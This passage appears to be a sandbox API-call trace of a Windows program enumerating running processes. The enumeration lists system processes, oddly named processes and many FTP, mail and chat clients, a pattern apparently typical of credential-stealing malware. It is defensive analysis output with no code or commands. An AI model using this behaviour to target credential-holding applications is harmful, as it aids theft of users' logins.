lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0180.498] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0180.501] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.503] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0180.505] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.549] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.552] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0180.554] CloseHandle (hObject=0x79c) returned 1 [0180.554] Sleep (dwMilliseconds=0x64) [0180.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c4 [0180.714] Process32First (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.716] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.718] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.720] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.722] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.726] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.728] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.730] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.732] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.789] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.792] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.794] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.796] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.803] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.805] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.807] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.810] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.812] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.815] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.817] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.819] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0180.821] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.824] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0180.826] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.828] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0180.901] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0180.903] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0180.905] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0180.907] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0180.908] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0180.910] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.912] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.913] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0180.915] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0180.916] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.918] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.920] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.921] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.922] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.934] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0180.935] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0180.937] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0180.939] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0180.940] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0180.942] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0180.943] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0180.960] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0181.003] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0181.006] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0181.011] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0181.013] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0181.016] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0181.019] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0181.032] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0181.036] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0181.038] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0181.041] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0181.043] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0181.047] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0181.054] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0181.063] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0181.065] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0181.068] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0181.071] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0181.074] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0181.076] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0181.079] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0181.082] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0181.085] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0181.087] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0181.090] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0181.097] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0181.100] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0181.102] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0181.105] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0181.107] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0181.110] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0181.113] Process32Next (in: hSnapshot=0x6c4, 